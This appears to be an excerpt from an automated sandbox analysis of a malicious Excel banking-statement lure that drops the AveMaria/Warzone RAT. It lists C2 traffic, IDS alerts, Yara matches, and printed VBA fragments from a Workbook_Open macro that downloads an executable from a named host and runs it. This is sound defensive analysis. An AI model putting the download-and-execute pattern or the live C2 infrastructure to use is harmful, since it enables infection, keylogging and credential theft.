                Source: global trafficTCP traffic: 192.168.2.22:49208 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49208
                Source: global trafficTCP traffic: 192.168.2.22:49208 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49208
                Source: global trafficTCP traffic: 192.168.2.22:49208 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49209 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49209
                Source: global trafficTCP traffic: 192.168.2.22:49209 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49209
                Source: global trafficTCP traffic: 192.168.2.22:49209 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49210 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49210
                Source: global trafficTCP traffic: 192.168.2.22:49210 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49210
                Source: global trafficTCP traffic: 192.168.2.22:49210 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49211 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49211
                Source: global trafficTCP traffic: 192.168.2.22:49211 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49211
                Source: global trafficTCP traffic: 192.168.2.22:49211 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49212 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49212
                Source: global trafficTCP traffic: 192.168.2.22:49212 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49212
                Source: global trafficTCP traffic: 192.168.2.22:49212 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49213 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49213
                Source: global trafficTCP traffic: 192.168.2.22:49213 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49213
                Source: global trafficTCP traffic: 192.168.2.22:49213 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49214 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49214
                Source: global trafficTCP traffic: 192.168.2.22:49214 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49214
                Source: global trafficTCP traffic: 192.168.2.22:49214 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49215 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49215
                Source: global trafficTCP traffic: 192.168.2.22:49215 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49215
                Source: global trafficTCP traffic: 192.168.2.22:49215 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49216 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49216
                Source: global trafficTCP traffic: 192.168.2.22:49216 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49216
                Source: global trafficTCP traffic: 192.168.2.22:49216 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49217 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49217
                Source: global trafficTCP traffic: 192.168.2.22:49217 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49217
                Source: global trafficTCP traffic: 192.168.2.22:49217 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49218 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49218
                Source: global trafficTCP traffic: 192.168.2.22:49218 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49218
                Source: global trafficTCP traffic: 192.168.2.22:49218 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49219 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49219
                Source: global trafficTCP traffic: 192.168.2.22:49219 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49219
                Source: global trafficTCP traffic: 192.168.2.22:49219 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49220 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49220
                Source: global trafficTCP traffic: 192.168.2.22:49220 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49220
                Source: global trafficTCP traffic: 192.168.2.22:49220 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49221 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49221
                Source: global trafficTCP traffic: 192.168.2.22:49221 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49221
                Source: global trafficTCP traffic: 192.168.2.22:49221 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49222 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49222
                Source: global trafficTCP traffic: 192.168.2.22:49222 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49222
                Source: global trafficTCP traffic: 192.168.2.22:49222 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49223 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49223
                Source: global trafficTCP traffic: 192.168.2.22:49223 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49223
                Source: global trafficTCP traffic: 192.168.2.22:49223 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49224 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49224
                Source: global trafficTCP traffic: 192.168.2.22:49224 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49224
                Source: global trafficTCP traffic: 192.168.2.22:49224 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49225 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49225
                Source: global trafficTCP traffic: 192.168.2.22:49225 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49225
                Source: global trafficTCP traffic: 192.168.2.22:49225 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49226 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49226
                Source: global trafficTCP traffic: 192.168.2.22:49226 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49226
                Source: global trafficTCP traffic: 192.168.2.22:49226 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49227 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49227
                Source: global trafficTCP traffic: 192.168.2.22:49227 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49227
                Source: global trafficTCP traffic: 192.168.2.22:49227 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49228 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49228
                Source: global trafficTCP traffic: 192.168.2.22:49228 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49228
                Source: global trafficTCP traffic: 192.168.2.22:49228 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49229 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49229
                Source: global trafficTCP traffic: 192.168.2.22:49229 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49229
                Source: global trafficTCP traffic: 192.168.2.22:49229 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49230 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49230
                Source: global trafficTCP traffic: 192.168.2.22:49230 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49230
                Source: global trafficTCP traffic: 192.168.2.22:49230 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49231 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49231
                Source: global trafficTCP traffic: 192.168.2.22:49231 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49231
                Source: global trafficTCP traffic: 192.168.2.22:49231 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49231
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49231
                Source: global trafficTCP traffic: 192.168.2.22:49231 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49232 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49232
                Source: global trafficTCP traffic: 192.168.2.22:49232 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49232
                Source: global trafficTCP traffic: 192.168.2.22:49232 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49233 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49233
                Source: global trafficTCP traffic: 192.168.2.22:49233 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49233
                Source: global trafficTCP traffic: 192.168.2.22:49233 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49234 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49234
                Source: global trafficTCP traffic: 192.168.2.22:49234 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49234
                Source: global trafficTCP traffic: 192.168.2.22:49234 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49235 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49235
                Source: global trafficTCP traffic: 192.168.2.22:49235 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49235
                Source: global trafficTCP traffic: 192.168.2.22:49235 -> 87.120.121.160:5220

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2036735 - Severity 1 - ET MALWARE Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound) : 87.120.121.160:5220 -> 192.168.2.22:49231
                Source: Network trafficSuricata IDS: 2852326 - Severity 1 - ETPRO MALWARE Ave Maria/Warzone RAT InitializePacket : 87.120.121.160:5220 -> 192.168.2.22:49231
                Source: Network trafficSuricata IDS: 2036734 - Severity 1 - ET MALWARE Ave Maria/Warzone RAT Encrypted CnC Checkin : 192.168.2.22:49231 -> 87.120.121.160:5220
                Source: Network trafficSuricata IDS: 2852327 - Severity 1 - ETPRO MALWARE Ave Maria/Warzone RAT BeaconResponse : 192.168.2.22:49231 -> 87.120.121.160:5220
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: dns.stipamana.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_004027D3 URLDownloadToFileW,ShellExecuteW,6_2_004027D3
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.121.160:5220
                Source: Joe Sandbox ViewIP Address: 87.120.121.160 87.120.121.160
                Source: Joe Sandbox ViewIP Address: 94.156.167.55 94.156.167.55
                Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                Source: global trafficHTTP traffic detected: GET /sdjfgsnzlkfoknzkfngasoeanpsDNbgsrggtehy/dyhdfyjdsftjsetawtwewayryghsdtysryatwewtrta/agasdrhstjhyfjghsrgaregafjyhdfhstsh/ydfctyxrgtsertrsez/asxhfzdhhz.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.stipamana.comConnection: Keep-Alive
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_0040D0A3 recv,6_2_0040D0A3
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\asxhfzdhhz[1].exeJump to behavior
                Source: global trafficHTTP traffic detected: GET /sdjfgsnzlkfoknzkfngasoeanpsDNbgsrggtehy/dyhdfyjdsftjsetawtwewayryghsdtysryatwewtrta/agasdrhstjhyfjghsrgaregafjyhdfhstsh/ydfctyxrgtsertrsez/asxhfzdhhz.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.stipamana.comConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: www.stipamana.com
                Source: global trafficDNS traffic detected: DNS query: dns.stipamana.com
                Source: VPZVQXDUT.exeString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeper
                Source: VPZVQXDUT.exe, 00000004.00000002.370971406.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, VPZVQXDUT.exe, 00000004.00000002.370788761.0000000002789000.00000004.00000800.00020000.00000000.sdmp, VPZVQXDUT.exe, 00000004.00000002.370788761.0000000002391000.00000004.00000800.00020000.00000000.sdmp, VPZVQXDUT.exe, 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, msimages.exe, 0000000B.00000002.377093347.0000000002998000.00000004.00000800.00020000.00000000.sdmp, msimages.exe, 0000000B.00000002.377093347.00000000029B7000.00000004.00000800.00020000.00000000.sdmp, msimages.exe, 0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmp, msimages.exe, 0000000E.00000002.402208161.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
                Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                Source: unknownHTTPS traffic detected: 94.156.167.55:443 -> 192.168.2.22:49163 version: TLS 1.2
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_004089D5 GetAsyncKeyState,wsprintfW,GetAsyncKeyState,wsprintfW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyNameTextW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,CallNextHookEx,6_2_004089D5
                Source: VPZVQXDUT.exe, 00000004.00000002.370971406.0000000003C6D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_6cf35796-b

                E-Banking Fraud

                barindex
                Yara detected AveMaria stealer
                Source: Yara matchFile source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.VPZVQXDUT.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.377093347.0000000002998000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.370788761.0000000002789000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.377093347.00000000029B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.402208161.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.370788761.0000000002391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.370971406.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 4.2.VPZVQXDUT.exe.3fb01e0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                Source: 4.2.VPZVQXDUT.exe.2783860.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                Source: 11.2.msimages.exe.29b1654.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                Source: 14.2.msimages.exe.29af650.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                Source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                Source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                Source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                Source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                Source: 6.2.VPZVQXDUT.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Source: 6.2.VPZVQXDUT.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 6.2.VPZVQXDUT.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                Source: 6.2.VPZVQXDUT.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                Source: 6.2.VPZVQXDUT.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                Source: 0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Source: 0000000B.00000002.377093347.0000000002998000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Author: unknown
                Source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                Source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                Source: 00000004.00000002.370788761.0000000002789000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Source: 0000000B.00000002.377093347.00000000029B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Source: 0000000E.00000002.402208161.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Source: 00000004.00000002.370788761.0000000002391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Source: 00000004.00000002.370971406.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Document contains an embedded VBA macro with suspicious strings
                Source: Estado.de.cuenta.xlsOLE, VBA macro line: Set WshShell = CreateObject("WScript.Shell")
                Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String wscript: Set WshShell = CreateObject("WScript.Shell")Name: Workbook_Open
                Document contains an embedded VBA with functions possibly related to ADO stream file operations
                Source: Estado.de.cuenta.xlsStream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, savetofile, write
                Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, API IXMLHTTPRequest.Open("get","https://www.stipamana.com/sdjfgsnzlkfoknzkfngasoeanpsDNbgsrggtehy/dyhdfyjdsftjsetawtwewayryghsdtysryatwewtrta/agasdrhstjhyfjghsrgaregafjyhdfhstsh/ydfctyxrgtsertrsez/asxhfzdhhz.exe",False)Name: Workbook_Open
                Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, API Stream.Open()Name: Workbook_Open
                Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, API Stream.Write(?\xfffd\x03\x00\x04\x00?\x00\xfffd\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x00????????????????4???????????$\x00\x00\x00?\x00O\x03??\x00\x00\x00\x00\xfffdAc\x0b?\x04?\x00\x00\x00?\x04 \x00?\x04\x00@ \x00?\x00\x04\x00\x00\x00\x04\x00\x00\x00?\x04?\x00\x00\x00\x02?\x00\x10?\x00\x00\x10?\x00\x00\x00\x10\x00\x00\x00\x00\x00?\x04O\x00?\x04?\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x04\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x08\x00\x00\x00\x00\x00?\x00H\x00\x00\x00\x00\x00??t\x00?\x04 \x00?\x04?\x00\x00\x00\x00\x00\x00\x00 ???c\x00?\x00?\x04?\x00?\x04\x00\x00\x00\x00\x00\x00@????\x00\x0c\x00?\x04?\x00?\x04\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00\x00\x00?\x04\x00\x00H\x00\x02\x05?\x04?\x00\x03\x00\x02?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00????????????????\x1e???????????????????????????????????????????????????????????????????????????????????????????+???????????????\xfffd\x17??????????????????????????????????????????????????????????????????????????-??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????U?????????????????????i?????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd????????????\xfffd??????????????????????????????????????????????????????R????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????S?????????????I??????????????????????????????????????????????????u<???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd????????????????????????????????????????????????????????????????????????????????????????????????????????'?????????????????????????????????????????????????H????????????????????????+?????????????????????a??????+????????????L????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd??????????????????????????E????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????U???????????????????<??????????????????????????????????????????????????????????????????????????????S??????????????????????????????????????????????r????????Name: Workbook_Open
                Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, API IShellDispatch6.Open("C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe")Name: Workbook_Open
                Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, found possibly 'ADODB.Stream' functions open, savetofile, writeName: Workbook_Open
                Document contains an embedded VBA with functions possibly related to HTTP operations
                Source: Estado.de.cuenta.xlsStream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, status, open, send
                Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, found possibly 'XMLHttpRequest' functions response, responsebody, status, open, sendName: Workbook_Open
                Document contains an embedded VBA with hexadecimal encoded strings
                Source: Estado.de.cuenta.xlsStream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found hex strings
